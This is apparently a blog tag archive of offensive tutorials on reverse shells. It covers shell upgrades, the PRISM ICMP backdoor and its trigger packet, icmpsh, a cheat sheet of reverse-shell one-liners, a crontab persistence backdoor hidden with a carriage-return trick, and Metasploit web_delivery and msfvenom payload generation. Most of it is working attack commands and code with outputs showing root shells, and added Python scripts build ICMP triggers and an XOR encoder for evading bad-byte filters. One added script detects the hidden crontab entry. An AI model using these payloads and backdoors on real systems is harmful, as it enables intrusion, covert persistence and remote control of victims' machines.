Tag archive: reverse shells

Upgrading a simple shell to an interactive one

1) The Python pty module
On a system that has Python installed, use the pty module:
python -c 'import pty; pty.spawn("/bin/bash")'
Test:

[root@server144 src]# ./netcat -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.192.120:42425
whoami
root
python -c 'import pty; pty.spawn("/bin/bash")' 
[root@server120 src]# cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin

However, up-arrow command history, Ctrl+C and Tab completion still do not work: the local terminal is still in cooked mode, so Ctrl+C kills the local netcat listener instead of reaching the remote command.

2) Using socat
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:4444

Reverse connection from the target:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.192.144:4444

Test:

[root@server144 src]# socat file:`tty`,raw,echo=0 tcp-listen:4444 
[root@server120 src]# whoami
root
[root@server120 src]# sleep 5
^C
[root@server120 src]#

Up-arrow history, Ctrl+C and Tab completion all work: the target side runs bash on a real pty, and the listener side puts its own terminal into raw mode so control characters are passed through.

3) Using stty
The first method gives no history, Ctrl+C or Tab completion, but the session can be upgraded with stty.
Start exactly as in the first method:

[root@server144 src]# ./netcat -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.192.120:42450
python -c 'import pty; pty.spawn("/bin/bash")' 
[root@server120 src]# ^Z
[1]+ Stopped ./netcat -vv -l -p 2345
[root@server144 src]# echo $TERM
xterm
[root@server144 src]# stty -a
speed 38400 baud; rows 31; columns 104; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>;
start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; flush = ^O; min = 1; time = 0;
-parenb -parodd cs8 -hupcl -cstopb cread -clocal -crtscts -cdtrdsr
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel
-iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke

The information we need is the TERM type ("xterm") and the size of the current TTY (31 rows; 104 columns).

[root@server144 src]# stty raw -echo

Type fg and press Enter (the local terminal is now raw with echo off, so nothing you type is shown, but it is executed). Then, in the remote shell, run:

$ reset
$ export SHELL=bash
$ export TERM=xterm
$ stty rows 31 columns 104

After that, up-arrow history, Ctrl+C and Tab completion work. When the session ends, run stty sane locally to restore your own terminal.
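The same upgrade done from the target side, as an added example that is not part of the original post: it runs bash on a pty, sets TERM and SHELL, and pushes the attacker's terminal size into the pty with the TIOCSWINSZ ioctl, which is what the blind "export TERM / stty rows columns" step achieves by hand. The script name, the default 31x104 size and the argument handling are my own choices; the listener side still has to do the Ctrl+Z, stty raw -echo, fg dance.

```python
import fcntl
import os
import pty
import select
import struct
import termios

# Added example (not from the original post). Runs on the target inside the
# netcat shell: python3 ptyshell.py <rows> <cols>. The size values come from
# `stty -a` on the attacker's terminal, as in the procedure above.


def winsize_struct(rows: int, cols: int) -> bytes:
    """Pack a struct winsize: ws_row, ws_col, ws_xpixel, ws_ypixel (native order)."""
    return struct.pack("HHHH", rows, cols, 0, 0)


def unpack_winsize(data: bytes):
    rows, cols, _, _ = struct.unpack("HHHH", data)
    return rows, cols


def set_winsize(fd: int, rows: int, cols: int) -> None:
    """Equivalent of `stty rows R columns C` on the terminal behind fd."""
    fcntl.ioctl(fd, termios.TIOCSWINSZ, winsize_struct(rows, cols))


def get_winsize(fd: int):
    return unpack_winsize(fcntl.ioctl(fd, termios.TIOCGWINSZ, b"\0" * 8))


def spawn_pty_shell(rows: int, cols: int, term: str = "xterm",
                    argv=("/bin/bash", "-i")) -> int:
    """Fork bash on a fresh pty and relay bytes between it and fds 0/1
    (the reverse-shell socket). Returns the child's wait status."""
    pid, master = pty.fork()
    if pid == 0:                      # child: the pty slave is now its controlling tty
        os.environ["TERM"] = term     # same as `export TERM=xterm`
        os.environ["SHELL"] = argv[0]  # same as `export SHELL=bash`
        os.execvp(argv[0], list(argv))
    set_winsize(master, rows, cols)   # the slave side reports this size to bash
    while True:
        readable, _, _ = select.select([0, master], [], [])
        if master in readable:
            try:
                data = os.read(master, 4096)
            except OSError:           # pty closed: the shell exited
                break
            if not data:
                break
            os.write(1, data)
        if 0 in readable:
            data = os.read(0, 4096)
            if not data:              # socket closed by the listener
                break
            os.write(master, data)
    _, status = os.waitpid(pid, 0)
    return status


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        rows, cols = int(sys.argv[1]), int(sys.argv[2])
    else:
        rows, cols = 31, 104          # the values from the stty -a output above
    spawn_pty_shell(rows, cols)
```

Because the size is set on the master before bash starts, readline picks it up on its first prompt, so line editing and Tab completion wrap at the right column without typing anything blind.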

Reference:
http://www.freebuf.com/news/142195.html

PRISM: an ICMP backdoor for Linux

Supported platforms

Linux

Solaris

AIX

BSD/Mac

Android

Features

Two modes: ICMP and STATIC

Customisable process name

No listening port

Can flush the iptables rules

Written in pure C

No library dependencies

Project

git clone https://github.com/andreafabrizi/prism.git

Build

gcc <..OPTIONS..> -Wall -s -o prism prism.c

Options:

-DDETACH    # run in the background

-DSTATIC    # STATIC mode (the default is ICMP mode)

-DNORENAME  # do not rename the process

-DIPTABLES  # flush all iptables rules

ICMP mode

In this mode the backdoor sits in the background waiting for a specific ICMP packet that carries the host/port to connect back to; a shared key in the packet keeps third parties from triggering it. A single ping packet is enough to activate it.

The key can be changed; the default is p4ssw0rd:

vim prism.c

#ifdef STATIC
# define REVERSE_HOST     "172.16.100.182"
# define REVERSE_PORT     6666
# define RESPAWN_DELAY    15
#else
# define ICMP_PACKET_SIZE 1024
# define ICMP_KEY         "p4ssw0rd"
#endif

#define VERSION          "0.5"
#define MOTD             "PRISM v"VERSION" started\n\n# "
#define SHELL            "/bin/sh"
#define PROCESS_NAME     "udevd"

Build in ICMP mode, detached, keeping the real process name:

gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c

[root@vincent prism-master]# ./prism Inf0

 Version:          0.5
 Mode:             icmp
 Key:              p4ssw0rd
 Shell:            /bin/sh
 Detach:           Yes
 Flush Iptables:   No

The mode is icmp.

Attacker (172.16.100.182):

nc -vv -l -p 6666

Victim (172.16.100.134):

./prism

Attacker (172.16.100.182), send the trigger packet:

./sendPacket.py 172.16.100.134 p4ssw0rd 172.16.100.182 6666

This sends an ICMP packet whose data is the key, the reverse host and the reverse port, padded with Q:
p4ssw0rd 172.16.100.182 6666 QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ

Then the shell comes back:

root@kali:/tmp/prism# nc -l -p 6666

PRISM v0.5 started

# whoami
root
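What sendPacket.py has to put on the wire, as an added example: this is my own reimplementation, not the project's script. Assumptions that the page does not state: the trigger is an ordinary ICMP echo request, its data is "key host port" followed by Q padding (which is what the captured payload above looks like), the padding length (256 bytes here) is arbitrary, and the backdoor side rejects a packet whose key does not match. The parse function models that receiving side so the check can be tested offline; sending needs root for the raw socket.

```python
import socket
import struct

# Added example, not the project's sendPacket.py. See the lead-in for the
# assumptions about the payload format and size.
ICMP_ECHO_REQUEST = 8
DEFAULT_PAYLOAD_SIZE = 256   # assumed; the page does not give the real size


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_trigger_payload(key: str, host: str, port: int,
                          size: int = DEFAULT_PAYLOAD_SIZE) -> bytes:
    """'key host port ' padded with 'Q' up to size bytes."""
    body = f"{key} {host} {port} ".encode()
    if len(body) > size:
        raise ValueError("trigger fields do not fit in the payload")
    return body + b"Q" * (size - len(body))


def build_icmp_echo(payload: bytes, ident: int = 0x1234, seq: int = 1) -> bytes:
    """ICMP header (type, code, checksum, id, seq) + data, checksum filled in."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq)
    return header + payload


def parse_trigger_payload(payload: bytes, expected_key: str = None):
    """The backdoor's side of the contract: strip padding, split the fields,
    check the key. Returns (key, host, port), or None if this is not a
    trigger (ordinary ping data, wrong key, malformed port)."""
    fields = payload.rstrip(b"Q").split()
    if len(fields) != 3 or not fields[2].isdigit():
        return None
    key, host, port = fields[0].decode(), fields[1].decode(), int(fields[2])
    if expected_key is not None and key != expected_key:
        return None          # wrong key: ignore the packet, like the backdoor
    return key, host, port


def send_trigger(target: str, key: str, host: str, port: int) -> int:
    """Send the echo request (raw sockets need root). Returns bytes sent."""
    packet = build_icmp_echo(build_trigger_payload(key, host, port))
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) as s:
        return s.sendto(packet, (target, 0))


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 5:
        sys.exit(f"usage: {sys.argv[0]} <target> <key> <reverse host> <reverse port>")
    n = send_trigger(sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4]))
    print(f"sent {n} bytes")
```

The kernel computes the IP header for a SOCK_RAW/IPPROTO_ICMP socket, so only the ICMP checksum has to be right; a receiver verifies it by summing the whole ICMP message and expecting zero, which is what the checks below do.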

STATIC mode

The backdoor connects out to the hard-coded IP:PORT, retrying every RESPAWN_DELAY seconds.

vim prism.c

#ifdef STATIC
# define REVERSE_HOST     "172.16.100.182"
# define REVERSE_PORT     6666
# define RESPAWN_DELAY    15
#else
# define ICMP_PACKET_SIZE 1024
# define ICMP_KEY         "p4ssw0rd"
#endif

#define VERSION          "0.5"
#define MOTD             "PRISM v"VERSION" started\n\n# "
#define SHELL            "/bin/sh"
#define PROCESS_NAME     "udevd"

REVERSE_HOST/REVERSE_PORT are the callback address, and the custom process name is udevd.

Rebuild in STATIC mode:

gcc -DDETACH -DSTATIC -Wall -s -o prism prism.c

[root@vincent prism-master]# ./prism Inf0

 Version:          0.5
 Mode:             static
 Host:             172.16.100.182
 Port:             6666
 Respawn Delay:    15 sec
 Process name:     udevd
 Shell:            /bin/sh
 Detach:           Yes
 Flush Iptables:   No

Attacker (172.16.100.182):

nc -vv -l -p 6666

Victim (172.16.100.134):

./prism

Check the process list; the backdoor shows up under the fake name:

[root@vincent prism-master]# ps axu | grep udev | grep -v grep
root      14474  0.0  0.0   3924   144 pts/1    S    17:26   0:00 udevd

Shell obtained:

root@kali:/tmp/prism# nc -l -p 6666

PRISM v0.5 started

# whoami
root

Reverse shell over ICMP

Tool: https://github.com/inquisb/icmpsh#usage
In environments with tight egress filtering, outbound TCP is blocked; this post looks at using an ICMP shell instead.
Characteristics:
1) Open source
2) Client/server (master/slave) architecture
3) The server (master) is cross-platform, with C, Perl and Python implementations
4) The client (slave) is Windows only
5) No administrator privileges are needed on the target

The server needs the Impacket Python package first. The master uses raw sockets, so it runs as root, and run.sh turns off the kernel's own echo replies (net.ipv4.icmp_echo_ignore_all=1) while it runs so they do not race with icmpsh's responses:

[root@server120 icmpsh-master]# pip install Impacket
[root@server120 icmpsh-master]# ./run.sh
##################################################################

ICMP Shell Automation Script for

https://github.com/inquisb/icmpsh

##################################################################

-------------------------------------------------------------------
[?] What is the victims public IP address?
-------------------------------------------------------------------
192.168.192.122

[-] Run the following code on your victim system on the listender has started:

++++++++++++++++++++++++++++++++++++++++++++++++++

icmpsh.exe -t 192.168.192.120 -d 500 -b 30 -s 128

++++++++++++++++++++++++++++++++++++++++++++++++++
[-] Local ICMP Replies are currently enabled, I will disable these temporarily now

[-] Launching Listener...,waiting for a inbound connection..
D:\>whoami
whoami
win-a94sbnf0i6b\administrator

Client (run on the Windows victim):
icmpsh.exe -t 192.168.192.120 -d 500 -b 30 -s 128

Reverse shell one-liners for various environments

bash:

bash -i >& /dev/tcp/106.187.43.96/2345 0>&1

Note: /dev/tcp is a feature of bash itself, not a real device file, so this fails when the command is run by another shell such as sh/dash (for example when a web shell's system() call runs /bin/sh).

perl:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php (assumes the socket ends up as file descriptor 3):

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby:

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc (the -e form needs a netcat built with that option; the mkfifo form works with any nc):

nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

java (Groovy syntax, as in the original cheat sheet):

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Source: http://zone.wooyun.org/content/5064

A file-less, broadly compatible reverse-shell backdoor via crontab

Best installed as an inconspicuous user; the job is written to /var/spool/cron/$username.

(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i')|crontab -

A sneakier variant

(crontab -l;printf "* * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1&&/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

crontab -l now just prints no crontab for $username: the \r in the entry returns the cursor to the start of the line and the fake message, padded with spaces, overwrites the real command on the terminal. It only fools a terminal, though: crontab -l | cat -v, or cat -v on the spool file, still shows the whole entry with a ^M in it.
[root@vincenthostname bin]# crontab -l
no crontab for root
Reverse shell received:
[vincent@iZ62luqzx5xZ src]$ ./netcat -l -p 2345
bash: no job control in this shell
[root@vincenthostname ~]# whoami
whoami
root

Source: http://zone.wooyun.org/content/18244
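A check for exactly this trick, as an added example that is not part of the original post: it reads the spool file the way cat -v would, splits on newlines only (splitlines() would treat the \r as a line break and hide the trick), and flags entries that contain a carriage return, /dev/tcp, an interactive shell or netcat plumbing. The sample crontab is constructed to match the entry above; the rule list and field names are my own.

```python
import re

# Constructed sample of /var/spool/cron/root as the printf trick above leaves
# it: an innocent job, then the hidden reverse shell followed by a CR and a
# fake "no crontab" message padded with spaces.
SAMPLE_CRONTAB = (
    "0 2 * * * /usr/bin/logrotate /etc/logrotate.conf\n"
    "* * * * * exec 9<> /dev/tcp/49.213.15.229/2345;exec 0<&9;exec 1>&9 2>&1"
    "&&/bin/bash --noprofile -i;\rno crontab for root" + " " * 100 + "\n"
)

# (pattern, reason) pairs; kept short so every hit is explainable
SUSPICIOUS = [
    (r"\r", "carriage return hides the real command when printed on a terminal"),
    (r"/dev/(tcp|udp)/", "bash /dev/tcp network redirection"),
    (r"\bbash(\s+--noprofile)?\s+-i\b|/bin/sh\s+-i\b", "interactive shell spawned by cron"),
    (r"\b(nc|ncat|socat|mkfifo)\b", "netcat/socat/fifo plumbing"),
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "download piped into a shell"),
]


def reveal(line: str) -> str:
    """Make control characters visible the way `cat -v` does (CR -> ^M)."""
    return "".join(f"^{chr(ord(c) + 64)}" if ord(c) < 32 and c != "\t" else c
                   for c in line)


def analyse_crontab(text: str):
    """One finding per cron line that matches a SUSPICIOUS rule.
    Split on \\n only: a \\r must stay inside the line to be detected."""
    findings = []
    for lineno, line in enumerate(text.split("\n"), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        reasons = [why for pattern, why in SUSPICIOUS if re.search(pattern, line)]
        if reasons:
            findings.append({
                "line": lineno,
                "shown_on_terminal": line.split("\r")[-1].strip(),
                "actual": reveal(line).strip(),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in analyse_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: terminal shows {f['shown_on_terminal']!r}")
        print(f"  actual: {f['actual']}")
        for r in f["reasons"]:
            print(f"  - {r}")
```

Run it over every file under /var/spool/cron and /etc/cron.d on a box you suspect; the "shown_on_terminal" field is what an admin would have seen, "actual" is what cron runs.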

Metasploit Web Delivery

Metasploit's web_delivery module starts a small web server on Kali; the URL it serves contains the payload, and the one-liner it prints fetches and executes that payload on the target.

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

Run that Python one-liner on the test machine; msfconsole shows:

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

PowerShell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

Run that PowerShell command on the test machine; msfconsole shows:

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

The reverse shell arrives on the netcat listener:

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671

Metasploit Framework msfvenom

msfvenom command-line options:

Options:

-p, --payload <payload>      Payload to use; specify '-' or stdin to use a custom payload
-l, --list [module_type]     List the available modules of a type: payloads, encoders, nops, all
-n, --nopsled <length>       Prepend a nopsled of the given length to the payload
-f, --format <format>        Output format (use --help-formats for the list)
-e, --encoder [encoder]      Encoder to use
-a, --arch <architecture>    Architecture of the payload
--platform <platform>        Platform of the payload
-s, --space <length>         Maximum size of the resulting payload
-b, --bad-chars <list>       Bytes to avoid, e.g. '\x00\xff'
-i, --iterations <count>     Number of times to encode the payload
-c, --add-code <path>        Additional win32 shellcode file to include
-x, --template <path>        Custom executable file to use as a template
-k, --keep                   Preserve the template's behaviour and inject the payload as a new thread (not a new process)
--payload-options            List the payload's standard options
-o, --out <path>             Save the payload to a file (redirecting with '>' works too)
-v, --var-name <name>        Custom variable name to use for certain output formats
--smallest                   Generate the smallest possible payload
-h, --help                   Show this help

--help-formats lists the output formats msfvenom supports:

root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

msfvenom does not understand the single uppercase format letters of the old msfpayload tool (X for exe and so on); it takes -f <format>, and without -f the output is raw. For reference, msfpayload's selectors were:

Cs[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]

First the payloads: there are 437 at the time of writing, roughly grouped by target platform (windows/linux/osx/android) and by language (python, php and so on).
root@kali:~# msfvenom -l payloads

List the encoders:
root@kali:~# msfvenom -l encoders
If you pass -b (a set of bytes to avoid), an encoder is chosen automatically.
Otherwise pick one explicitly with -e, for example:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
-i encodes the payload several times:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe
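What -b and -e are doing under the hood, as an added example that is not Metasploit code: the simplest possible encoder, a single-byte XOR, searched for a key whose output contains none of the bad bytes. It is not shikata_ga_nai (a polymorphic additive-feedback XOR), and the "shellcode" is a constructed nine-byte x86 fragment (mov eax,0xb; xor ebx,ebx; int 0x80) chosen only because it contains NUL bytes. One detail practitioners forget: the key itself must not be a bad byte either, because it is embedded in the decoder stub.

```python
# Added example (not msfvenom code). Constructed fragment with three NULs:
# b8 0b 00 00 00  mov eax, 0xb ; 31 db  xor ebx, ebx ; cd 80  int 0x80
SAMPLE_SHELLCODE = bytes.fromhex("b80b000000" "31db" "cd80")


def bad_char_positions(data: bytes, bad: set) -> list:
    """(offset, byte) for every byte that is in the bad-char set."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def xor_encode(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; applying it twice decodes."""
    return bytes(b ^ key for b in data)


def find_xor_key(shellcode: bytes, bad: set):
    """First key whose encoded output contains no bad byte. The key is
    skipped if it is itself a bad byte: the decoder stub has to contain it."""
    for key in range(1, 256):
        if key in bad:
            continue
        if not bad_char_positions(xor_encode(shellcode, key), bad):
            return key
    return None


def encode_for_badchars(shellcode: bytes, bad: set):
    """Return (key, encoded), or raise when no single-byte key works,
    which is when a real encoder (or -i iterations) is needed."""
    key = find_xor_key(shellcode, bad)
    if key is None:
        raise ValueError("no single-byte XOR key avoids the bad chars")
    encoded = xor_encode(shellcode, key)
    assert xor_encode(encoded, key) == shellcode   # round-trip check
    return key, encoded


def as_c_array(data: bytes) -> str:
    """Render like `msfvenom -f c`, for pasting into a test harness."""
    return '"' + "".join(f"\\x{b:02x}" for b in data) + '"'


if __name__ == "__main__":
    bad = {0x00, 0x0a, 0x0d}          # the usual NUL / LF / CR set
    print("bad bytes in original:", bad_char_positions(SAMPLE_SHELLCODE, bad))
    key, enc = encode_for_badchars(SAMPLE_SHELLCODE, bad)
    print(f"key=0x{key:02x} encoded={as_c_array(enc)}")
```

A payload that contains every byte value defeats any single-byte XOR (some byte always maps to 0x00), which is why real encoders use a running key and why -b sometimes fails with "no encoders encoded the buffer successfully".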

Some usage demonstrations follow:
Kali: 172.16.100.182
Test machine: 172.16.100.155

Generating a PHP backdoor with msfvenom


List the PHP payloads:

msfvenom -l payloads | grep php

We use bind_php here:

php/bind_php Listen for a connection and spawn a command shell via php

Show the payload options:

root@kali:~# msfvenom -p php/bind_php --payload-options

Generate the backdoor (the trailing R is leftover msfpayload syntax that msfvenom ignores; the output defaults to raw, which -f raw states explicitly):

msfvenom -p php/bind_php RHOST=172.16.100.155 R

Strip the leading /* from the output, save it as 1.php under the web root and request http://172.16.100.155/1.php. The bind shell then listens inside httpd:

[root@vincenthostname html]# netstat -antlp | grep httpd
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1494/httpd

msf > use multi/handler
msf exploit(handler) > set payload php/bind_php
payload => php/bind_php
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------



Payload options (php/bind_php):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address



Exploit target:

Id Name
-- ----
0 Wildcard Target



msf exploit(handler) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800

Upgrade to Meterpreter:

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.182:4433 
[*] Sending stage (826840 bytes) to 172.16.100.155
[*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command stager progress: 100.00% (736/736 bytes)
msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell php/php 172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155)
2 meterpreter x86/linux uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155 172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer : 172.16.100.155
OS : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter : x86/linux

Generating a Java (JSP) backdoor with msfvenom


List the usable payloads:

msfvenom -l payloads | grep java

We use:

java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp
Payload size: 1500 bytes

Request the JSP to get the reverse shell:

msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

E:\tomcat\bin>whoami
whoami
dell-pc\dell

Generating a Windows backdoor with msfvenom


root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

Local listener:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
